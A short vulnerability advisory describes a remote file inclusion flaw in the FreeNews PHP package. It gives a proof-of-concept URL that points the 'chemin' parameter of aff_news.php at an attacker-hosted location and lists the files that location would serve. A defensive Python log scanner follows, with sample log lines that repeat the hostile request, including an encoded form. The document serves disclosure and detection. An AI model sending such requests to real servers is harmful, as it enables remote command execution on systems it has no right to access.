source: https://www.securityfocus.com/bid/6258/info
FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems.
Programming errors in FreeNews could allow the web application to include arbitrary files hosted on remote servers. A remote user can place commands in these include files, which could then be executed on the host running FreeNews. This would make remote arbitrary command execution with the privileges of the web user possible.
http://example.com/aff_news.php?chemin=http://example.org/include

with

http://example.org/config.php
http://example.org/options.inc.php
http://example.org/freenews_functions.inc.php
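
A log check for the request pattern in this advisory, added here as an example and not part of the original advisory or of FreeNews. It flags requests to aff_news.php whose chemin value points at a remote location; the log format, the sample lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); all hosts and
# addresses are documentation placeholders.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Dec/2002:10:00:01 +0000] "GET /aff_news.php?chemin=include HTTP/1.0" 200 5120
192.0.2.77 - - [01/Dec/2002:10:02:13 +0000] "GET /aff_news.php?chemin=http://example.org/include HTTP/1.0" 200 812
192.0.2.77 - - [01/Dec/2002:10:02:40 +0000] "GET /aff_news.php?chemin=hTTp%3A%2F%2Fexample.org%2Finclude HTTP/1.0" 200 812
192.0.2.15 - - [01/Dec/2002:10:05:00 +0000] "GET /index.php?ref=http://example.com/ HTTP/1.0" 200 2048
'''

# Client address and request target from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A scheme prefix (http:, ftp:, php:, data:, ...) or a protocol-relative "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)


def find_remote_chemin(log_text, script="aff_news.php", param="chemin"):
    """Return (client, decoded value) pairs where `param` names a remote location."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/" + script):
            continue  # same parameter name on another script is out of scope
        # parse_qs removes one layer of percent-encoding; unquote once more
        # so double-encoded values (%253A%252F%252F) are also normalised.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            value = unquote(value)
            if REMOTE_RE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_remote_chemin(SAMPLE_LOG):
        print(f"{client} requested remote include path: {value}")
```

A legitimate request carries a local relative path in chemin, so any hit is worth reviewing together with outbound connections made by the web server at the same time.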